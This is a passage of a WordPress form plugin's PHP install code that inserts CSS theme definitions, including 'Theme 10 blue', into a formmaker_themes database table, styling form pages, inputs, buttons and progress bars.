0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #000;\r\n	cursor: pointer;\r\n	background-color: #FFD9B8;\r\n	margin: 1px;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_active {\r\n	color: #000;\r\n	cursor: pointer;\r\n	background-color: #FFB471;\r\n	margin: 1px;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 25px;\r\n	line-height: 25px;\r\n	border-top-left-radius: 17px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #FF983C; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #f6a965 0%, #f6a965 67%, #ff983c 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #f6a965), color-stop(67%, #f6a965), color-stop(100%, #ff983c)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #f6a965 0%, #f6a965 67%, #ff983c 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #f6a965 0%, #f6a965 67%, #ff983c 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #f6a965 0%, #f6a965 67%, #ff983c 100%); /* IE10+ */\r\n	background: linear-gradient(to right, #f6a965 0%, #f6a965 67%, #ff983c 100%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 25px;\r\n	line-height: 25px;\r\n	background-color: #FFD9B8;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n	border-top-left-radius: 17px;\r\n	border-top-right-radius: 17px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_page_navigation span:first-child {\r\n	border-top-left-radius: 17px;\r\n}\r\n.wdform_percentage_arrow {\r\ndisplay: inline-block;\r\nwidth: 21px;\r\nheight: 25px;\r\nbackground-color: #FF983D;\r\nposition: relative;\r\nleft: -15px;\r\nz-index: 0;\r\nvertical-align: middle;\r\n-moz-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n-webkit-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n-o-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n-ms-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\ntransform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px -14px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 25px;\r\n	height: 25px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform_button button {\r\n	background: #e4e4e4; /* Old browsers */\r\n	background: -moz-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #e4e4e4), color-stop(100%, #cccccc)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* IE10+ */\r\n	background: linear-gradient(to bottom, #e4e4e4 0%, #cccccc 100%); /* W3C */\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 7px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`id`, `title`, `css`, `default`) VALUES(36, \'Theme 10 blue\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #D1E0F0;\r\nborder: 1px solid #075DA4;\r\nmargin-bottom: 10px;\r\ncolor: #075DA4;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/01/02/next_hoverbg.png) url([SITE_ROOT]/images/01/02/previous_hover.png) url([SITE_ROOT]/images/01/02/next_hover.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #004D8E !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #004D8E !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #004D8E !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #004D8E !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff;\r\n	margin: 7px 0px;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -8px !important;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #A4A4A4 !important;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 7px;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 26px;\r\n	line-height: 26px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 28px;\r\n	width: 32px;\r\n	background: url([SITE_ROOT]/images/01/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 1px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-page-and-images:after {\r\n	width: 100%;\r\n	content: "";\r\n	display: block;\r\n	height: 17px;\r\n	background: url([SITE_ROOT]/images/01/0.png) no-repeat center center;\r\n	position: relative;\r\n	background-size: cover;\r\n	top: -17px;\r\n	left: -50px;\r\n	padding-left: 100px;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 7px;\r\n	height: 27px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n//text-overflow: ellipsis;\r\n}\r\n.file-picker {\r\n	width: 38px;\r\n	height: 34px;\r\n	background: url([SITE_ROOT]/images/01/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #414141;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background: url([SITE_ROOT]/images/01/nextbg.png) no-repeat right center;\r\n	-webkit-background-size: cover;\r\n	-moz-background-size: cover;\r\n	-o-background-size: cover;\r\n	background-size: cover;\r\n	border-style: solid;\r\n	padding: 0px 15px;\r\n	vertical-align: middle;\r\n	border-color: transparent;\r\n}\r\ndiv.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/01/02/next_hoverbg.png) no-repeat right center;\r\n	-webkit-background-size: cover;\r\n	-moz-background-size: cover;\r\n	-o-background-size: cover;\r\n	background-size: cover;\r\ncolor:#fff;\r\n}\r\n.next-page div.wdform-page-button {\r\n	border-width: 0px 18px 0px 0px;\r\n	-moz-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	box-shadow: inset 51px 0px 8px -50px #636363;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	-moz-border-image: url([SITE_ROOT]/images/01/02/next_hover.png) 0 36 0 0 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/02/next_hover.png) 0 36 0 0 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/02/next_hover.png) 0 36 0 0 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/02/next_hover.png) 0 36 0 0 stretch;\r\n}\r\n.next-page:before {\r\n	content: "";\r\n	height: 56px;\r\n	vertical-align: middle;\r\n	background: url([SITE_ROOT]/images/01/shadow.png) no-repeat left center;\r\n	background-size: contain;\r\n	width: 7px;\r\n	display: inline-block;\r\n	position: relative;\r\n	left: 7px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	border-width: 0px 0px 0px 18px;\r\n	-moz-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	box-shadow: inset -51px 0px 8px -50px #636363;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	-moz-border-image: url([SITE_ROOT]/images/01/02/previous_hover.png) 0 0 0 36 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/02/previous_hover.png) 0 0 0 36 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/02/previous_hover.png) 0 0 0 36 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/02/previous_hover.png) 0 0 0 36 stretch;\r\n}\r\n.previous-page:after {\r\n	content: "";\r\n	height: 56px;\r\n	vertical-align: middle;\r\n	background: url([SITE_ROOT]/images/01/shadow1.png) no-repeat right center;\r\n	background-size: contain;\r\n	width: 7px;\r\n	display: inline-block;\r\n	position: relative;\r\n	left: -7px;\r\n}\r\n.button-submit {\r\nbackground: #035192 ;\r\nbackground: -moz-linear-gradient(left, #035192 0%, #0860A9 20%, #0860A9 80%, #035192 100%);\r\nbackground: -webkit-gradient(linear, left top, right top, color-stop(0%, #035192 ), color-stop(20%, #0860A9 ), color-stop(80%, #0860A9 ), color-stop(100%, #035192 ));\r\nbackground: -webkit-linear-gradient(left, #035192 0%, #0860A9 20%, #0860A9 80%, #035192 100%);\r\nbackground: -o-linear-gradient(left, #035192 0%, #0860A9 20%, #0860A9 80%, #035192 100%);\r\nbackground: -ms-linear-gradient(left, #035192 0%, #0860A9 20%, #0860A9 80%, #035192 100%);\r\nbackground: linear-gradient(to right, #035192 0%, #0860A9 20%, #0860A9 80%, #035192 100%);\r\ncursor: pointer;\r\nfont-size: 17px;\r\nborder-radius: 7px;\r\nmin-width: 80px;\r\nmin-height: 34px;\r\ncolor: #fff;\r\nborder: 1px solid #3A8BCF;\r\nmargin: 5px;\r\nbox-shadow: 0px 0px 1px 1px #063A66;\r\nfont-family: Segoe UI;\r\n	}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 7px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 1px solid #c9c9c9;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_page {\r\n	background: #D1E0F0;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n	border-top: 1px solid #004D8E;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform-field-section-break2 {\r\n	background: url([SITE_ROOT]/images/01/shadow.png) no-repeat left center;\r\n	background-size: contain;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: #0559A0 ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #00457F 1%, #0559A0 20%, #0E6AB8 80%, #006CC7 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(1%, #00457F ), color-stop(20%, #0559A0 ), color-stop(80%, #0E6AB8 ), color-stop(100%, #006CC7 )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #00457F 1%, #0559A0 20%, #0E6AB8 80%, #006CC7 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #00457F 1%, #0559A0 20%, #0E6AB8 80%, #006CC7 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #00457F 1%, #0559A0 20%, #0E6AB8 80%, #006CC7 100%); /* IE10+ */\r\nbackground: linear-gradient(to right, #00457F 1%, #0559A0 20%, #0E6AB8 80%, #006CC7 100%); /* W3C */\r\n	text-align: left;\r\n	padding: 7px 30px 10px 10px;\r\n	border-top-left-radius: 0px;\r\n	border-top-right-radius: 10px;\r\n	border-bottom-right-radius: 10px;\r\n	border-bottom-left-radius: 0px;\r\n	-moz-box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\n	box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\ncolor:#fff;\r\nfont-size:18px;\r\n}\r\n\r\n.wdform_section_break {\r\n	margin: 16px 0px;\r\nfont-size:18px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 7px;\r\n	height: 32px;\r\n	overflow: hidden;\r\n	border: 1px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus{\r\n	border-color: #004D8E;\r\n	outline: none;\r\n}\r\n\r\ninput[type="password"]:focus{\r\n	border-color: #004D8E;\r\n	outline: none;\r\n}\r\n\r\ntextarea:focus{\r\n	border-color: #004D8E;\r\n	outline: none;\r\n}\r\n\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 70px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 15px;\r\n	height: 16px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 5px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/01/checkbox.png);\r\n	border-radius: 2px;\r\n	top: 0px;\r\n	left: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/01/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 37px;\r\n	height: 30px;\r\n	position: relative;\r\n	left: -35px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.wdform-calendar-button:focus {\r\n	outline:none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 15px;\r\n	height: 16px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 5px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 10px;\r\n	background: #615F60;\r\n	border-radius: 2px;\r\n	top: 3px;\r\n	left: 3px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	border-top: 1px solid #D8D6D7;\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 7px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #0D5492;\r\n	cursor: pointer;\r\n	background-color: #7FA6C6;\r\n	margin: 1px;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #004D8E;\r\n	margin: 1px;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 25px;\r\n	line-height: 25px;\r\n	border-top-left-radius: 17px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #00559D ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #00559D 0%, #005BA7 67%, #00559D 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #00559D ), color-stop(67%, #005BA7 ), color-stop(100%, #00559D )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #00559D 0%, #005BA7 67%, #00559D 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #00559D 0%, #005BA7 67%, #00559D 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #00559D 0%, #005BA7 67%, #00559D 100%); /* IE10+ */\r\nbackground: linear-gradient(to right, #00559D 0%, #005BA7 67%, #00559D 100%);\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 25px;\r\n	line-height: 25px;\r\n	background-color: #7FA6C6;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n	border-top-left-radius: 17px;\r\n	border-top-right-radius: 17px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_page_navigation span:first-child {\r\n	border-top-left-radius: 17px;\r\n}\r\n.wdform_percentage_arrow {\r\ndisplay: inline-block;\r\nwidth: 21px;\r\nheight: 25px;\r\nbackground-color: #0057A0;\r\nposition: relative;\r\nleft: -15px;\r\nz-index: 0;\r\nvertical-align: middle;\r\n-moz-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n-webkit-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n-o-transform: scale(1) 